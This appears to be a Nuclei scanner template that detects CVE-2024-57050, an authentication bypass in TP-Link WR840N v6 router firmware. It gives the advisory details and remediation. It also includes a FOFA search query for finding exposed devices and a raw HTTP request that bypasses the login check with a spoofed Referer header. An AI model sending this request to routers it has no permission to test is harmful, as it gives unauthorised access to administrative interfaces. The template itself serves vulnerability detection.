TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication

id: CVE-2024-57050

info:
  name: TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication
  author: DhiyaneshDK
  severity: critical
  description: |
    A vulnerability in the TP-Link WR840N v6 router with firmware version 0.9.1 4.16 and earlier permits unauthorized individuals to bypass the authentication of some interfaces under the /cgi directory.When adding Referer- http-//tplinkwifi.net to the the request, it will be recognized as passing the authentication.
  impact: |
    Unauthenticated attackers can bypass authentication by adding a specific Referer header, gaining unauthorized access to router administrative interfaces.
  remediation: |
    Update TP-Link WR840N v6 router to firmware version later than 0.9.1 4.16 that addresses the authentication bypass vulnerability.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/WR840N%20v6/ACL%20bypass%20Vulnerability%20in%20TP-Link%20TL-WR840N.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57050
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-57050
    cwe-id: CWE-287
    epss-score: 0.00043
    epss-percentile: 0.1187
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="WR840N"
  tags: cve,cve2024,tp-link,auth-bypass,vuln

http:
  - raw:
      - |
        POST /cgi/getParm HTTP/1.1
        Host: {{Hostname}}
        Referer: http://tplinkwifi.net

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "$.ret=0;"
          - "var "
        condition: and

      - type: word
        part: content_type
        words:
          - "application/javascript"

      - type: status
        status:
          - 200
# digest: 490a0046304402201b0472de911fe092aa007d8e937eeedbe5720b2fd3411714df3a4d5ba229b35f0220774b0ca6abfaa7598bf9fc7ec32171c097fde41c1b14f98278618e59c1533ee9:922c64590222798bb761d5b6d8e72950